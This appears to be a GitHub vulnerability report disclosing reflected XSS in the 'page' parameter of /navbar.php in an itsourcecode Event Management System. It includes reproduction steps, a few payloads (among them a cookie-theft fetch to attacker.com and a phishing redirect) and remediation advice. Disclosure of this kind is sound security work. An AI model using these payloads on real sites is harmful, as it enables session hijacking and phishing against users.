-
Notifications
You must be signed in to change notification settings - Fork 0
Description
itsourcecode Event Management System XSS Vulnerability Report
PRODUCT
Event Management System
VERSION
V1.0
VULNERABILITY TYPE
Cross-Site Scripting (XSS)
Submitter
- super_luoqing
AFFECTED COMPONENT
/navbar.php
VENDOR URL
VULNERABILITY DETAILS
Reflected XSS via 'page' parameter in /navbar.php
DESCRIPTION
A critical Cross-Site Scripting vulnerability was identified in the Event Management System . The vulnerability exists in the /navbar.php component where user-supplied input through the 'page' URL parameter is directly reflected in the page output without proper sanitization. This allows attackers to inject arbitrary JavaScript code that executes within the context of the victim's browser session. The vulnerability requires no authentication and can be exploited simply by tricking a user into visiting a maliciously crafted URL.
ROOT CAUSE
Unsanitized user input in URL parameter directly reflected in page output
IMPACT
- Session hijacking
- Unauthorized actions
- Data theft
- Malware distribution
REPRODUCTION STEPS
- Visit URL:
http://192.168.174.128:10013/admin/navbar.php?page=</script><script>alert(0)</script><script> - Observe JavaScript execution
PAYLOAD EXAMPLES
- Basic: </script><script>alert(document.domain)</script><script>
- Cookie theft: </script><script>fetch('http://attacker.com/steal?cookie='+document.cookie)</script><script>
- Redirect: </script><script>window.location='http://phishing.site'</script><script>
REMEDIATION
-
Input validation:
- Reject special characters
- Use allow-list approach
-
Output encoding:
- htmlspecialchars()
- htmlentities()
-
Security headers:
- Content-Security-Policy
- X-XSS-Protection
-
Regular security testing